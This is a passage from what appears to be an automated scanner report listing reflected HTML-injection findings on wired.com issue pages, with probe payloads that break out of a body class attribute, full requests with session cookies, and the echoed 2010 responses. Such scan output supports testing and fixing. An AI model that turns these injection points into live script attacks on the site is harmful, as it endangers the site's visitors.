The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6cf8b"><a>fce6565d5ba was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /wired/issue/15-086cf8b"><a>fce6565d5ba/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29353
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Mon, 22 Nov 2010 01:10:06 GMT
Date: Mon, 22 Nov 2010 01:06:06 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_wired ss_issue c_15-086cf8b"><a>fce6565d5ba">
...[SNIP]...

1.1333. http://www.wired.com/wired/issue/15-09/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /wired/issue/15-09/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e3418"><a>ce195589fa5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /wired/issuee3418"><a>ce195589fa5/15-09/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29353
Vary: Accept-Encoding
Cache-Control: max-age=223
Expires: Mon, 22 Nov 2010 01:09:07 GMT
Date: Mon, 22 Nov 2010 01:05:24 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_wired ss_issuee3418"><a>ce195589fa5 c_15-09">
...[SNIP]...

1.1334. http://www.wired.com/wired/issue/15-09/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /wired/issue/15-09/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a2054"><a>b50705ffc44 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /wired/issue/15-09a2054"><a>b50705ffc44/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29353
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Mon, 22 Nov 2010 01:10:14 GMT
Date: Mon, 22 Nov 2010 01:06:14 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_wired ss_issue c_15-09a2054"><a>b50705ffc44">
...[SNIP]...

1.1335. http://www.wired.com/wired/issue/15-10/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /wired/issue/15-10/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a7378"><a>52f5bbca6a4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /wired/issuea7378"><a>52f5bbca6a4/15-10/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29353
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Mon, 22 Nov 2010 01:09:42 GMT
Date: Mon, 22 Nov 2010 01:05:42 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_wired ss_issuea7378"><a>52f5bbca6a4 c_15-10">
...[SNIP]...

1.1336. http://www.wired.com/wired/issue/15-10/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /wired/issue/15-10/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e79ad"><a>9471c5b3eb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /wired/issue/15-10e79ad"><a>9471c5b3eb/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29351
Vary: Accept-Encoding
Cache-Control: max-age=234
Expires: Mon, 22 Nov 2010 01:10:22 GMT
Date: Mon, 22 Nov 2010 01:06:28 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_wired ss_issue c_15-10e79ad"><a>9471c5b3eb">
...[SNIP]...

1.1337. http://www.wired.com/wired/issue/15-11/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /wired/issue/15-11/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac69b"><a>f9de393d2ac was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /wired/issueac69b"><a>f9de393d2ac/15-11/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29353
Vary: Accept-Encoding
Cache-Control: max-age=227
Expires: Mon, 22 Nov 2010 01:09:01 GMT
Date: Mon, 22 Nov 2010 01:05:14 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_wired ss_issueac69b"><a>f9de393d2ac c_15-11">
...[SNIP]...

1.1338. http://www.wired.com/wired/issue/15-11/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /wired/issue/15-11/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 24d8d"><a>4c6530b8720 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /wired/issue/15-1124d8d"><a>4c6530b8720/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29353
Vary: Accept-Encoding
Cache-Control: max-age=219
Expires: Mon, 22 Nov 2010 01:09:40 GMT
Date: Mon, 22 Nov 2010 01:06:01 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_wired ss_issue c_15-1124d8d"><a>4c6530b8720">
...[SNIP]...

1.1339. http://www.wired.com/wired/issue/15-12/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /wired/issue/15-12/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a2a5"><a>a67b1f7302a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /wired/issue9a2a5"><a>a67b1f7302a/15-12/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29353
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Mon, 22 Nov 2010 01:09:15 GMT
Date: Mon, 22 Nov 2010 01:05:15 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_wired ss_issue9a2a5"><a>a67b1f7302a c_15-12">
...[SNIP]...

1.1340. http://www.wired.com/wired/issue/15-12/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /wired/issue/15-12/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d16b8"><a>544844ba869 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /wired/issue/15-12d16b8"><a>544844ba869/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29353
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Mon, 22 Nov 2010 01:10:11 GMT
Date: Mon, 22 Nov 2010 01:06:11 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_wired ss_issue c_15-12d16b8"><a>544844ba869">
...[SNIP]...

1.1341. http://www.wired.com/wired/issue/16-01/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /wired/issue/16-01/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ec8eb"><a>8d7d3783758 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /wired/issueec8eb"><a>8d7d3783758/16-01/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29353
Vary: Accept-Encoding
Cache-Control: max-age=217
Expires: Mon, 22 Nov 2010 01:08:42 GMT
Date: Mon, 22 Nov 2010 01:05:05 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_wired ss_issueec8eb"><a>8d7d3783758 c_16-01">
...[SNIP]...

1.1342. http://www.wired.com/wired/issue/16-01/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /wired/issue/16-01/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d800f"><a>31d49709012 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /wired/issue/16-01d800f"><a>31d49709012/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29353
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Mon, 22 Nov 2010 01:10:00 GMT
Date: Mon, 22 Nov 2010 01:06:00 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_wired ss_issue c_16-01d800f"><a>31d49709012">
...[SNIP]...

1.1343. http://www.wired.com/wired/issue/16-02/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /wired/issue/16-02/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8d5c8"><a>d90cdd2b885 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /wired/issue8d5c8"><a>d90cdd2b885/16-02/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29353
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Mon, 22 Nov 2010 01:09:15 GMT
Date: Mon, 22 Nov 2010 01:05:15 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_wired ss_issue8d5c8"><a>d90cdd2b885 c_16-02">
...[SNIP]...

1.1344. http://www.wired.com/wired/issue/16-02/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /wired/issue/16-02/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 25886"><a>49703bfc46d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /wired/issue/16-0225886"><a>49703bfc46d/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29353
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Mon, 22 Nov 2010 01:10:02 GMT
Date: Mon, 22 Nov 2010 01:06:02 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_wired ss_issue c_16-0225886"><a>49703bfc46d">
...[SNIP]...

1.1345. http://www.wired.com/wired/issue/16-03/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /wired/issue/16-03/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e9dc"><a>6371e337d69 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /wired/issue1e9dc"><a>6371e337d69/16-03/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29353
Vary: Accept-Encoding
Cache-Control: max-age=236
Expires: Mon, 22 Nov 2010 01:08:58 GMT
Date: Mon, 22 Nov 2010 01:05:02 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_wired ss_issue1e9dc"><a>6371e337d69 c_16-03">
...[SNIP]...

1.1346. http://www.wired.com/wired/issue/16-03/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /wired/issue/16-03/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b0de6"><a>6137b71f920 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /wired/issue/16-03b0de6"><a>6137b71f920/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29353
Vary: Accept-Encoding
Cache-Control: max-age=219
Expires: Mon, 22 Nov 2010 01:09:26 GMT
Date: Mon, 22 Nov 2010 01:05:47 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_wired ss_issue c_16-03b0de6"><a>6137b71f920">
...[SNIP]...

1.1347. http://www.wired.com/wired/issue/16-04/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /wired/issue/16-04/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 37019"><a>e9e4b1f3822 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /wired/issue37019"><a>e9e4b1f3822/16-04/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29353
Vary: Accept-Encoding
Cache-Control: max-age=225
Expires: Mon, 22 Nov 2010 01:08:48 GMT
Date: Mon, 22 Nov 2010 01:05:03 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_wired ss_issue37019"><a>e9e4b1f3822 c_16-04">
...[SNIP]...

1.1348. http://www.wired.com/wired/issue/16-04/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
